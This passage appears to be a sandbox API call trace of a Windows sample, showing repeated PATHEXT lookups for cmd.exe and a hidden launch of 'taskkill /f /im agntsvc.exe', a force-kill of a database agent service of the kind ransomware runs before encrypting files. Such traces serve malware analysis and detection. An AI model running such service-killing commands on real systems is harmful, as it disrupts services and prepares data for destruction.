CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.455] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12450378 | out: lpFileInformation=0x12450378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.455] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.455] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124503c8 | out: lpFileInformation=0x124503c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.455] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.455] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12450418 | out: lpFileInformation=0x12450418*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.455] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.455] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12450468 | out: lpFileInformation=0x12450468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.456] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.456] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124504b8 | out: lpFileInformation=0x124504b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.456] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.456] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12450508 | out: lpFileInformation=0x12450508*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.456] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.456] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12450558 | out: lpFileInformation=0x12450558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.456] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.456] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124505a8 | out: lpFileInformation=0x124505a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.457] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.457] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124505f8 | out: lpFileInformation=0x124505f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.457] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.459] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12450648 | out: lpFileInformation=0x12450648*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.459] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.459] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12450698 | out: lpFileInformation=0x12450698*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.459] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0174.459] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e9520, nSize=0x64 | out: lpBuffer="") returned 0x63 [0174.459] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124506e8 | out: lpFileInformation=0x124506e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0174.460] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e95f0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0174.460] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450738 | out: lpFileInformation=0x12450738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0174.460] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0174.460] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0174.460] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0174.460] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0174.460] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0174.460] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0174.460] GetEnvironmentStringsW () returned 0x8ea900* [0174.461] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0174.461] GetCurrentProcess () returned 0xffffffff [0174.461] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456570, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456570*=0x140) returned 1 [0174.461] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456574, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456574*=0x144) returned 1 [0174.461] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456578, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456578*=0x154) returned 1 [0174.462] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im agntsvc.exeagntsvc.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12445500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im agntsvc.exeagntsvc.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0x1064, dwThreadId=0x1048)) returned 1 [0174.576] SetEvent (hEvent=0x150) returned 1 [0174.576] CloseHandle (hObject=0x158) returned 1 [0174.576] CloseHandle (hObject=0x154) returned 1 [0174.576] CloseHandle (hObject=0x144) returned 1 [0174.576] CloseHandle (hObject=0x140) returned 1 [0174.577] CloseHandle (hObject=0x13c) returned 1 [0174.577] CloseHandle (hObject=0x138) returned 1 [0174.577] CloseHandle (hObject=0x134) returned 1 [0174.577] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0176.808] SetEvent (hEvent=0x150) returned 1 [0176.808] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0176.808] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x1242baa0, lpExitTime=0x1242baa8, lpKernelTime=0x1242bab0, lpUserTime=0x1242bab8 | out: lpCreationTime=0x1242baa0, lpExitTime=0x1242baa8, lpKernelTime=0x1242bab0, lpUserTime=0x1242bab8) returned 1 [0176.809] CloseHandle (hObject=0x130) returned 1 [0176.809] SetEvent (hEvent=0x128) returned 1 [0176.810] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0176.824] SetEvent (hEvent=0x150) returned 1 [0176.824] SetEvent (hEvent=0x128) returned 1 [0176.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb5f0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0176.825] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124467d8 | out: lpFileInformation=0x124467d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.826] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.826] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12446828 | out: lpFileInformation=0x12446828*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.827] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.827] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446878 | out: lpFileInformation=0x12446878*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.827] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.828] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124468c8 | out: lpFileInformation=0x124468c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.828] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.829] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12446918 | out: lpFileInformation=0x12446918*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.829] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.829] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12446968 | out: lpFileInformation=0x12446968*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.830] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.830] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124469b8 | out: lpFileInformation=0x124469b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.830] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.830] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12446a08 | out: lpFileInformation=0x12446a08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.830] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.830] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12446a58 | out: lpFileInformation=0x12446a58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.830] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.830] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12446aa8 | out: lpFileInformation=0x12446aa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.831] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.831] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12446af8 | out: lpFileInformation=0x12446af8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.831] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.831] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12446b48 | out: lpFileInformation=0x12446b48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.831] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0176.831] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bb6c0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0176.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446b98 | out: lpFileInformation=0x12446b98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0176.832] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb790, nSize=0x64 | out: lpBuffer="") returned 0x35 [0176.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446be8 | out: lpFileInformation=0x12446be8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0176.832] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 